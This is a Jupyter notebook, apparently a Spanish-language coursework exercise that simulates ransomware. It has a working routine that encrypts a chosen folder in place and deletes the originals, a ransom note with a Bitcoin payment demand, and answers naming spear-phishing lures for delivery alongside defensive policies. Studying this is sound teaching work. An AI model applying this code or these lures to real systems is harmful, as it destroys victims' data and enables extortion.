In [4]:
!pip install pycryptodome
!pip install rsa

In [5]:
import os
import hashlib
import json
from datetime import datetime
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Signature import PKCS1_v1_5
from Crypto.Hash import SHA256, HMAC
from Crypto.Util.Padding import pad, unpad
from base64 import b64encode, b64decode
import logging
import time # For simulation delays

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Global variables for keys and certificates (simulated persistence)
ATTACKER_LT_KEY = None
VICTIM_LT_KEY = None
ATTACKER_CERT = None
VICTIM_CERT = None
SHARED_SECRET = None
SYMMETRIC_KEY = None
ENCRYPTED_FILES_INFO = [] # To store (original_path, encrypted_path) tuples

# Simulated Database for Ransomware Operations (using JSON files)
RANSOM_DB_DIR = "ransomware_logs"
os.makedirs(RANSOM_DB_DIR, exist_ok=True)

def log_ransom_event(victim_id, event_type, file_path=None, original_hash=None, encrypted_path=None, decrypted_path=None, status="SUCCESS", message=""):
    """Logs ransomware events to a victim-specific JSON file."""
    log_file = os.path.join(RANSOM_DB_DIR, f"victim_{victim_id}_log.json")

    log_entry = {
        "timestamp": datetime.now().isoformat(),
        "event_type": event_type,
        "status": status,
        "file_path": file_path,
        "original_hash": original_hash,
        "encrypted_path": encrypted_path,
        "decrypted_path": decrypted_path,
        "message": message
    }

    if os.path.exists(log_file):
        with open(log_file, 'r+') as f:
            data = json.load(f)
            data.append(log_entry)
            f.seek(0)
            json.dump(data, f, indent=4)
    else:
        with open(log_file, 'w') as f:
            json.dump([log_entry], f, indent=4)

    logging.info(f"Logged event for victim {victim_id}: {event_type} - {status} - {message}")

def get_victim_file_hashes(victim_id):
    """Retrieves original file hashes for a victim from the log."""
    log_file = os.path.join(RANSOM_DB_DIR, f"victim_{victim_id}_log.json")
    if os.path.exists(log_file):
        with open(log_file, 'r') as f:
            data = json.load(f)
            hashes = {entry['file_path']: entry['original_hash']
                      for entry in data if entry['event_type'] == 'ENCRYPT' and entry['original_hash']}
            return hashes
    return {}

In [6]:
def crear_archivos(nombre='carpeta_prueba', n=5):
    if os.path.exists(nombre):
        shutil.rmtree(nombre)
    os.makedirs(nombre)
    for i in range(n):
        with open(f"{nombre}/archivo_{i}.txt", 'w') as f:
            f.write(f"Archivo confidencial {i}: {random.randint(10000,99999)}")
    print(f"✅ Carpeta '{nombre}' creada con {n} archivos.")
    return nombre

#carpeta_prueba = crear_archivos()


In [7]:
def generate_rsa_key_pair(bits=2048):
    """Generates an RSA key pair."""
    key = RSA.generate(bits)
    return key

def create_certificate(identity, public_key, private_key):
    """Creates a simple self-signed certificate."""
    cert = {
        "id": identity,
        "pk": public_key.export_key().decode('utf-8')
    }
    # Sign the certificate with the private key
    h = SHA256.new(json.dumps(cert).encode('utf-8'))
    signer = PKCS1_v1_5.new(private_key)
    signature = signer.sign(h)
    cert["signature"] = b64encode(signature).decode('utf-8')
    return cert

def verify_certificate(cert, public_key):
    """Verifies a certificate's signature."""
    signature = b64decode(cert["signature"])
    cert_copy = cert.copy()
    del cert_copy["signature"] # Remove signature before hashing
    h = SHA256.new(json.dumps(cert_copy).encode('utf-8'))
    verifier = PKCS1_v1_5.new(public_key)
    try:
        verifier.verify(h, signature)
        return True
    except (ValueError, TypeError):
        return False

# AKE v.2 Protocol Implementation (Simplified for simulation)
def ake_v2_phase1_attacker():
    """Attacker's Phase 1: Generates ephemeral key and sends public part."""
    attacker_ephemeral_key = generate_rsa_key_pair()
    logging.info("Attacker: Generated ephemeral key.")
    return attacker_ephemeral_key, attacker_ephemeral_key.publickey().export_key().decode('utf-8')

def ake_v2_phase2_victim(attacker_eph_pk_str, victim_cert, victim_priv_key):
    """Victim's Phase 2: Generates ephemeral key, encrypts shared secret, and signs."""
    victim_ephemeral_key = generate_rsa_key_pair()
    logging.info("Victim: Generated ephemeral key.")

    attacker_eph_pk = RSA.import_key(attacker_eph_pk_str)

    # K_AB (shared secret, simulated as a random 1024-bit value)
    shared_secret_k_ab = os.urandom(128) # 1024 bits

    # Encrypt K_AB with Attacker's ephemeral public key
    cipher_rsa_attacker = PKCS1_OAEP.new(attacker_eph_pk)
    encrypted_k_ab = cipher_rsa_attacker.encrypt(shared_secret_k_ab)

    # Sign the victim's ephemeral public key and encrypted K_AB
    message_to_sign = victim_ephemeral_key.publickey().export_key('PEM') + encrypted_k_ab
    h = SHA256.new(message_to_sign)
    signer = PKCS1_v1_5.new(victim_priv_key)
    signature = signer.sign(h)

    logging.info("Victim: Encrypted shared secret and signed message.")
    return victim_ephemeral_key, encrypted_k_ab, b64encode(signature).decode('utf-8')

def ake_v2_phase3_attacker(victim_eph_key_str, encrypted_k_ab, victim_signature_b64, attacker_priv_key, victim_cert_pk_str):
    """Attacker's Phase 3: Decrypts shared secret and verifies victim's signature."""

    victim_eph_key_public = RSA.import_key(victim_eph_key_str)
    victim_cert_pk = RSA.import_key(victim_cert_pk_str)
    victim_signature = b64decode(victim_signature_b64)

    message_to_verify = victim_eph_key_public.export_key('PEM') + encrypted_k_ab
    h = SHA256.new(message_to_verify)
    verifier = PKCS1_v1_5.new(victim_cert_pk)
    try:
        verifier.verify(h, victim_signature)
        logging.info("Attacker: Victim's signature verified successfully.")
    except (ValueError, TypeError):
        logging.error("Attacker: Victim's signature verification failed!")
        return None

    cipher_rsa_attacker = PKCS1_OAEP.new(attacker_priv_key)
    decrypted_k_ab = cipher_rsa_attacker.decrypt(encrypted_k_ab)

    logging.info("Attacker: Decrypted shared secret.")
    return decrypted_k_ab

def derive_symmetric_key(shared_secret, salt=b"ransomware_salt"):
    """Derives a symmetric key using HMAC-SHA256 as KDF."""
    h = HMAC.new(salt, digestmod=SHA256)
    h.update(shared_secret)
    return h.digest()[:32] # Return a 256-bit key for AES-256

class RansomwareCipher:
    def __init__(self, key):
        self.key = key

    def encrypt_file(self, file_path): # Removed output_dir as encryption is in-place
        """Encrypts a file in its original location and deletes the original."""
        try:
            original_data = open(file_path, 'rb').read()
            original_hash = hashlib.sha256(original_data).hexdigest()

            cipher = AES.new(self.key, AES.MODE_CBC)
            ct_bytes = cipher.encrypt(pad(original_data, AES.block_size))

            encrypted_file_path = file_path + ".enc" # Encrypts in the same directory

            with open(encrypted_file_path, 'wb') as f:
                f.write(cipher.iv)
                f.write(ct_bytes)

            # Delete the original file
            os.remove(file_path)
            logging.info(f"File encrypted: {file_path} -> {encrypted_file_path}. Original deleted.")
            return encrypted_file_path, original_hash
        except Exception as e:
            logging.error(f"Error encrypting file {file_path}: {e}")
            return None, None

    def decrypt_file(self, encrypted_file_path): # No output_dir, decrypts in place
        """Decrypts a file in its original encrypted location and deletes the encrypted file."""
        try:
            with open(encrypted_file_path, 'rb') as f:
                iv = f.read(16)
                ciphertext = f.read()

            cipher = AES.new(self.key, AES.MODE_CBC, iv=iv)
            pt = unpad(cipher.decrypt(ciphertext), AES.block_size)

            # Determine the original file path (remove .enc extension)
            original_file_path = encrypted_file_path.replace(".enc", "")

            with open(original_file_path, 'wb') as f:
                f.write(pt)

            # Delete the encrypted file after successful decryption
            os.remove(encrypted_file_path)

            decrypted_hash = hashlib.sha256(pt).hexdigest()
            logging.info(f"File decrypted: {encrypted_file_path} -> {original_file_path}. Encrypted deleted.")
            return original_file_path, decrypted_hash
        except Exception as e:
            logging.error(f"Error decrypting file {encrypted_file_path}: {e}")
            return None, None

def scan_files_for_encryption(directory, victim_id, cipher_instance, excluded_extensions=None):
    """Scans a directory and encrypts target files."""
    global ENCRYPTED_FILES_INFO
    if excluded_extensions is None:
        excluded_extensions = ['.enc', '.log', '.json', '.py', '.ipynb'] # Avoid encrypting critical files

    files_found = 0
    files_encrypted = 0
    logging.info(f"Scanning directory: {directory}")
    log_ransom_event(victim_id, "SCAN_START", message=f"Starting scan of directory: {directory}")

    for root, _, files in os.walk(directory):
        for file in files:
            file_path = os.path.join(root, file)

            if any(file_path.endswith(ext) for ext in excluded_extensions):
                logging.info(f"Skipping excluded file: {file_path}")
                log_ransom_event(victim_id, "SCAN_SKIP", file_path=file_path, message="File skipped due to exclusion list.")
                continue

            if not os.path.basename(file_path).startswith('.'): # Skip hidden files
                files_found += 1 # Count files that are candidates for encryption
                logging.info(f"Attempting to encrypt: {file_path}")
                log_ransom_event(victim_id, "ENCRYPT_ATTEMPT", file_path=file_path, message="Attempting to encrypt file.")

                # Encrypt in-place, original is deleted
                encrypted_path, original_hash = cipher_instance.encrypt_file(file_path)

                if encrypted_path and original_hash:
                    # Store original_path, and the NEW encrypted_path
                    ENCRYPTED_FILES_INFO.append((file_path, encrypted_path))
                    log_ransom_event(victim_id, "ENCRYPT", file_path=file_path, # Log original path for decryption lookup
                                     original_hash=original_hash, encrypted_path=encrypted_path,
                                     message="File successfully encrypted and original deleted.")
                    files_encrypted += 1
                else:
                    log_ransom_event(victim_id, "ENCRYPT_FAILED", file_path=file_path, status="FAILED",
                                     message="File encryption failed.")
    logging.info(f"Finished scanning and encrypting files in: {directory}. Found {files_found} potential files, encrypted {files_encrypted}.")
    log_ransom_event(victim_id, "SCAN_END", message=f"Finished scan. Found {files_found} potential files, encrypted {files_encrypted}.")
    return ENCRYPTED_FILES_INFO

def verify_and_decrypt_files(encrypted_files_list, victim_id, cipher_instance):
    """Verifies integrity and decrypts files."""
    original_hashes_db = get_victim_file_hashes(victim_id)
    logging.info(f"Starting decryption for victim {victim_id}.")
    log_ransom_event(victim_id, "DECRYPT_START", message="Starting decryption process.")

    for original_path, encrypted_path in encrypted_files_list:
        # Check if the encrypted file actually exists before attempting decryption
        if not os.path.exists(encrypted_path):
            logging.warning(f"Encrypted file '{encrypted_path}' not found for decryption. Skipping.")
            log_ransom_event(victim_id, "DECRYPT_SKIPPED", file_path=original_path,
                             encrypted_path=encrypted_path, status="SKIPPED",
                             message="Encrypted file not found, skipping decryption.")
            continue # Skip to the next file

        logging.info(f"Attempting to decrypt: {encrypted_path}")
        log_ransom_event(victim_id, "DECRYPT_ATTEMPT", file_path=original_path, encrypted_path=encrypted_path, message="Attempting to decrypt file.")

        # Decrypt, now returning to original location and deleting .enc
        decrypted_path, decrypted_hash = cipher_instance.decrypt_file(encrypted_path)

        if decrypted_path and decrypted_hash:
            expected_hash = original_hashes_db.get(original_path) # Look up hash using original_path
            if expected_hash and expected_hash == decrypted_hash:
                logging.info(f"Integrity check PASSED for {original_path}.")
                log_ransom_event(victim_id, "DECRYPT", file_path=original_path,
                                 encrypted_path=encrypted_path, decrypted_path=decrypted_path,
                                 original_hash=expected_hash, status="SUCCESS - INTEGRITY OK",
                                 message="File decrypted successfully with integrity verified.")
            else:
                logging.warning(f"Integrity check FAILED for {original_path}. Expected: {expected_hash}, Got: {decrypted_hash}")
                log_ransom_event(victim_id, "DECRYPT", file_path=original_path,
                                 encrypted_path=encrypted_path, decrypted_path=decrypted_path,
                                 original_hash=expected_hash, status="SUCCESS - INTEGRITY FAILED",
                                 message="File decrypted, but integrity check failed.")
        else:
            log_ransom_event(victim_id, "DECRYPT_FAILED", file_path=original_path,
                             encrypted_path=encrypted_path, status="FAILED",
                             message="File decryption failed.")
    logging.info(f"Finished decryption for victim {victim_id}.")
    log_ransom_event(victim_id, "DECRYPT_END", message="Decryption process completed.")

In [8]:
# --- PHASE 1: THE ATTACK ---

print("███████╗███████╗ █████╗ ███╗   ██╗███████╗ ██████╗ ███╗   ███╗███████╗")
print("██╔════╝██╔════╝██╔══██╗████╗  ██║██╔════╝██╔═══██╗████╗ ████║██╔════╝")
print("███████╗█████╗  ███████║██╔██╗ ██║█████╗  ██║   ██║██╔████╔██║█████╗  ")
print("╚════██║██╔══╝  ██╔══██║██║╚██╗██║██╔══╝  ██║   ██║██║╚██╔╝██║██╔══╝  ")
print("███████║███████╗██║  ██║██║ ╚████║███████╗╚██████╔╝██║ ╚═╝ ██║███████╗")
print("╚══════╝╚══════╝╚═╝  ╚═╝╚═╝  ╚══╝╚══════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝")
print("\n[INITIATING RANSOMWARE SEQUENCE...]\n")
time.sleep(2)

# 1. Generate Attacker and Victim Long-Term Keys and Certificates
logging.info("--- Generating Long-Term Keys and Certificates ---")
ATTACKER_LT_KEY = generate_rsa_key_pair()
VICTIM_LT_KEY = generate_rsa_key_pair()

ATTACKER_CERT = create_certificate("AttackerID_123", ATTACKER_LT_KEY.publickey(), ATTACKER_LT_KEY)
VICTIM_CERT = create_certificate("VictimID_456", VICTIM_LT_KEY.publickey(), VICTIM_LT_KEY)

# Verify certificates (optional, for demonstration)
print("\n--- Certificate Verification ---")
print(f"Attacker Certificate Valid: {verify_certificate(ATTACKER_CERT, ATTACKER_LT_KEY.publickey())}")
print(f"Victim Certificate Valid: {verify_certificate(VICTIM_CERT, VICTIM_LT_KEY.publickey())}")
log_ransom_event("VictimID_456", "SETUP", message="Certificates generated and verified.")

# 2. AKE v.2 Protocol Simulation
logging.info("\n--- AKE v.2 Protocol Simulation ---")

# Attacker Phase 1
attacker_eph_key, attacker_eph_pk_str = ake_v2_phase1_attacker()

# Victim Phase 2 (Simulated connection: victim receives attacker_eph_pk_str)
victim_eph_key, encrypted_k_ab, victim_signature_b64 = ake_v2_phase2_victim(
    attacker_eph_pk_str, VICTIM_CERT, VICTIM_LT_KEY
)

# Attacker Phase 3 (Simulated connection: attacker receives victim's response)
SHARED_SECRET = ake_v2_phase3_attacker(
    victim_eph_key.publickey().export_key().decode('utf-8'),
    encrypted_k_ab, victim_signature_b64,
    attacker_eph_key, VICTIM_CERT["pk"]
)

if SHARED_SECRET:
    print(f"\nShared secret established. Key exchange successful.")
    SYMMETRIC_KEY = derive_symmetric_key(SHARED_SECRET)
    print(f"Symmetric Key (derived): {b64encode(SYMMETRIC_KEY).decode()}")
    log_ransom_event("VictimID_456", "KEY_EXCHANGE", message="Shared secret and symmetric key established.")
else:
    logging.error("Failed to establish shared secret. Attack aborted.")
    log_ransom_event("VictimID_456", "KEY_EXCHANGE_FAILED", status="FAILED", message="Failed to establish shared secret.")
    exit()

# 3. File Encryption
logging.info("\n--- File Encryption Phase ---")

# Create some dummy files for testing if not already present
test_dir = "victim_files"
os.makedirs(test_dir, exist_ok=True)

# Ensure fresh dummy files for each run if they've been encrypted/deleted
# Clean up previous encrypted files and create new originals
for f_name in ["document.txt", "image.jpg", "notes.pdf"]:
    full_path = os.path.join(test_dir, f_name)
    enc_path = full_path + ".enc"
    if os.path.exists(full_path):
        os.remove(full_path)
    if os.path.exists(enc_path):
        os.remove(enc_path)

if not os.path.exists(os.path.join(test_dir, "document.txt")):
    with open(os.path.join(test_dir, "document.txt"), "w") as f:
        f.write("This is a very important document that needs to be encrypted.")
    with open(os.path.join(test_dir, "image.jpg"), "wb") as f:
        f.write(os.urandom(1024)) # Dummy binary file
    with open(os.path.join(test_dir, "notes.pdf"), "w") as f: # Another dummy file
        f.write("Just some random notes for a PDF file.")
    print(f"\nCreated fresh dummy files in '{test_dir}' for demonstration.")

# Ask user for target directory
target_directory = input(f"\nEnter the target directory for encryption (e.g., '{test_dir}'): ")
if not os.path.isdir(target_directory):
    print(f"Error: Directory '{target_directory}' not found. Please create it or enter a valid path.")
    log_ransom_event("VictimID_456", "TARGET_DIR_ERROR", status="FAILED", message=f"Invalid target directory: {target_directory}")
else:
    print(f"Targeting directory: {target_directory}")
    ransom_cipher = RansomwareCipher(SYMMETRIC_KEY)
    ENCRYPTED_FILES_INFO = scan_files_for_encryption(target_directory, "VictimID_456", ransom_cipher)

# 4. Ransomware Notification
print("\n" + "="*80)
print("                       !!! ALL YOUR FILES ARE ENCRYPTED !!!")
print("="*80)
print("\nYour valuable data has been locked with military-grade encryption.")
print("Do NOT attempt to recover your files using third-party tools or modify them.")
print("This WILL result in irreversible data loss.")
print("\nTo restore your files, you must transfer the exact amount of Bitcoin to the address below:")
print("\n    Bitcoin Address:  1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa  (Case-sensitive)")
print("    Amount:           0.5 BTC")
print("\n[!!] Payment Deadline: 48 hours from now. After this, the decryption key will be destroyed [!!]")
print("\nOnce payment is confirmed, you will receive a unique decryption key and instructions.")
print(f"Your unique victim ID: VictimID_456")
print("Contact us at: decrypt.support@protonmail.com (attach your Victim ID).")
print("\nWe monitor transactions. Pay promptly to avoid permanent loss.")
print("="*80)
log_ransom_event("VictimID_456", "RANSOM_NOTE_DISPLAYED", message="Ransom note displayed to victim.")

███████╗███████╗ █████╗ ███╗   ██╗███████╗ ██████╗ ███╗   ███╗███████╗
██╔════╝██╔════╝██╔══██╗████╗  ██║██╔════╝██╔═══██╗████╗ ████║██╔════╝
███████╗█████╗  ███████║██╔██╗ ██║█████╗  ██║   ██║██╔████╔██║█████╗  
╚════██║██╔══╝  ██╔══██║██║╚██╗██║██╔══╝  ██║   ██║██║╚██╔╝██║██╔══╝  
███████║███████╗██║  ██║██║ ╚████║███████╗╚██████╔╝██║ ╚═╝ ██║███████╗
╚══════╝╚══════╝╚═╝  ╚═╝╚═╝  ╚══╝╚══════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝

[INITIATING RANSOMWARE SEQUENCE...]


--- Certificate Verification ---
Attacker Certificate Valid: True
Victim Certificate Valid: True

Shared secret established. Key exchange successful.
Symmetric Key (derived): 5lEGvw8NJKNcLFn1LK7k1xqu/ZkA/HWC+7XQGdCHx/k=

Created fresh dummy files in 'victim_files' for demonstration.

Enter the target directory for encryption (e.g., 'victim_files'): victim_files
Targeting directory: victim_files

                       !!! ALL YOUR FILES ARE ENCRYPTED !!!

Your valuable data has been locked with military-grade encryption.
Do NOT at

In [9]:
# --- PHASE 2: PAYMENT SIMULATION ---

print("\n" + "="*80)
print("                       PAYMENT GATEWAY SIMULATION")
print("="*80)

payment_choice = input("Do you wish to make the payment (y/n)? ").lower()

if payment_choice == 'y':
    print("\nProcessing payment...")
    time.sleep(3) # Simulate transaction time
    print("\nPayment successful! Generating payment receipt...")
    payment_receipt = {
        "VictimID": "VictimID_456",
        "AmountPaid": "0.5 BTC",
        "TransactionID": "SIMULATED_TXN_" + hashlib.sha256(os.urandom(16)).hexdigest()[:10],
        "Timestamp": datetime.now().isoformat(),
        "Status": "Confirmed"
    }
    print(json.dumps(payment_receipt, indent=4))

    log_ransom_event("VictimID_456", "PAYMENT", message="Simulated payment received.", status="SUCCESS")

    print("\n--- Attacker Sends Decryption Instructions ---")
    print("\n[ATTACKER'S DECRYPTION INSTRUCTIONS]")
    print("Payment confirmed. Your decryption key is ready.")
    print("We have used an authenticated key exchange protocol to establish a shared secret.")
    print("From this shared secret, you can **derive your unique decryption key** using the provided information:")
    print(f"Decryption Key (derived from shared secret): {b64encode(SYMMETRIC_KEY).decode()}")
    print("\nUse this key in the decryption tool to restore your files.")
    print("Keep this key safe. Proceed to the decryption step.")
    log_ransom_event("VictimID_456", "KEY_RELEASED", message="Decryption key derived from shared secret provided to victim after simulated payment.", status="SUCCESS")

else:
    print("\nPayment declined. Your files remain encrypted.")
    log_ransom_event("VictimID_456", "PAYMENT_DECLINED", message="Victim declined to pay.", status="DECLINED")
    SYMMETRIC_KEY = None # In a real scenario, the victim wouldn't get the key
    print("Exiting simulation. No decryption key provided.")


                       PAYMENT GATEWAY SIMULATION
Do you wish to make the payment (y/n)? y

Processing payment...

Payment successful! Generating payment receipt...
{
    "VictimID": "VictimID_456",
    "AmountPaid": "0.5 BTC",
    "TransactionID": "SIMULATED_TXN_8a8bfe7edb",
    "Timestamp": "2025-05-23T05:37:55.118912",
    "Status": "Confirmed"
}

--- Attacker Sends Decryption Instructions ---

[ATTACKER'S DECRYPTION INSTRUCTIONS]
Payment confirmed. Your decryption key is ready.
We have used an authenticated key exchange protocol to establish a shared secret.
From this shared secret, you can **derive your unique decryption key** using the provided information:
Decryption Key (derived from shared secret): 5lEGvw8NJKNcLFn1LK7k1xqu/ZkA/HWC+7XQGdCHx/k=

Use this key in the decryption tool to restore your files.
Keep this key safe. Proceed to the decryption step.


In [10]:
# --- PHASE 3: DECRYPTION PROCESS ---

print("\n" + "="*80)
print("                       FILE DECRYPTION TOOL")
print("="*80)

if SYMMETRIC_KEY is None:
    print("No decryption key available. Please complete the payment process first.")
else:
    print("\nEnter the decryption key provided by the attacker:")
    input_key_b64 = input("Decryption Key: ")

    try:
        input_key = b64decode(input_key_b64)
        if input_key == SYMMETRIC_KEY:
            print("\nDecryption key accepted. Initiating file recovery...")
            victim_decrypt_cipher = RansomwareCipher(SYMMETRIC_KEY)

            # The verify_and_decrypt_files function now handles in-place decryption
            verify_and_decrypt_files(ENCRYPTED_FILES_INFO, "VictimID_456", victim_decrypt_cipher)

            print("\n--- Final Integrity Verification ---")
            original_hashes = get_victim_file_hashes("VictimID_456")
            all_files_ok = True
            for original_path, _ in ENCRYPTED_FILES_INFO: # Use original_path to check for the re-created file
                # The decrypted file should now be at original_path
                decrypted_file_check_path = original_path

                if os.path.exists(decrypted_file_check_path):
                    current_decrypted_hash = hashlib.sha256(open(decrypted_file_check_path, 'rb').read()).hexdigest()
                    if original_hashes.get(original_path) == current_decrypted_hash:
                        print(f"SUCCESS: '{original_path}' decrypted correctly. Hash matches.")
                    else:
                        print(f"FAILURE: '{original_path}' decrypted but hash MISMATCHES! Data corruption likely.")
                        all_files_ok = False
                else:
                    print(f"FAILURE: Original file '{original_path}' was not found after decryption.")
                    all_files_ok = False

            if all_files_ok:
                print("\nAll decrypted files passed integrity checks. Your data has been successfully recovered!")
                log_ransom_event("VictimID_456", "DECRYPTION_COMPLETE", message="All files decrypted and integrity verified.", status="SUCCESS")
            else:
                print("\nSome files may have issues. Check logs for details.")
                log_ransom_event("VictimID_456", "DECRYPTION_COMPLETE_WITH_ISSUES", message="Decryption completed, but some integrity issues detected.", status="WARNING")

        else:
            print("\nInvalid decryption key. Access denied.")
            log_ransom_event("VictimID_456", "DECRYPTION_FAILED", message="Invalid key provided.", status="FAILED")
    except Exception as e:
        print(f"\nAn error occurred during key processing: {e}")
        log_ransom_event("VictimID_456", "DECRYPTION_FAILED", message=f"Error during key processing: {e}", status="FAILED")

print("\nSimulation complete.")


                       FILE DECRYPTION TOOL

Enter the decryption key provided by the attacker:
Decryption Key: 5lEGvw8NJKNcLFn1LK7k1xqu/ZkA/HWC+7XQGdCHx/k=

Decryption key accepted. Initiating file recovery...

--- Final Integrity Verification ---
SUCCESS: 'victim_files/document.txt' decrypted correctly. Hash matches.
SUCCESS: 'victim_files/image.jpg' decrypted correctly. Hash matches.
SUCCESS: 'victim_files/notes.pdf' decrypted correctly. Hash matches.

All decrypted files passed integrity checks. Your data has been successfully recovered!

Simulation complete.


##**Preguntas**
1.   Asuman el rol del atacante. Imaginen que realizan una implementación
funcional y real de su malware y lo convierten en un arma de ataque ¿Qué
estrategias utilizarían para que la víctima lo instale en su máquina? Es decir,
¿Cómo implementarían el paso 1 descrito en la operación?

Si fueramos el atacante el método principal seria por phishing dirigido (spear phishing), lo cual significa enviar correos electrónicos personalizados que parecen provenir de entidades legítimas (bancos, proveedores, gobierno) con documentos adjuntos maliciosos o enlaces a sitios de descarga. También esta la opcion de suplantación de identidad (impersonation) en la cual se hace pasar por soporte técnico, empleados de alto nivel o proveedores de confianza para solicitar la instalación de "actualizaciones críticas". La última opcion sería phishing por medio de correo utilizando pretexting: Crear escenarios convincentes como "Su equipo está en riesgo, instale esta herramienta de protección inmediatamente".


2.   Asuman el rol del defensor. Describan políticas y prácticas para garantizar la confidencialidad, la integridad y la disponibilidad de recursos informáticos en una organización. En particular, estas políticas y prácticas deberían mitigar la ocurrencia de este tipo de ataques.

La protección efectiva contra ataques de ransomware requiere un enfoque de defensa en profundidad que abarque aspectos técnicos, organizacionales y humanos. Una organización debe comenzar implementando controles técnicos robustos como parte de su estrategia preventiva. La protección de datos representa quizás el componente más crítico de la mitigación, implementando una estrategia de copias de seguridad que siga el principio 3-2-1: mantener al menos tres copias de datos críticos, almacenadas en dos tipos diferentes de medios, con una copia guardada fuera de sitio y preferiblemente desconectada de la red.

El factor humano no debe subestimarse en esta ecuación defensiva. Un programa efectivo de capacitación y concientización debe incluir simulaciones regulares de phishing con retroalimentación constructiva, entrenamientos trimestrales sobre nuevas amenazas y el fomento de una cultura organizacional que anime a los empleados a reportar actividades sospechosas sin temor a represalias.

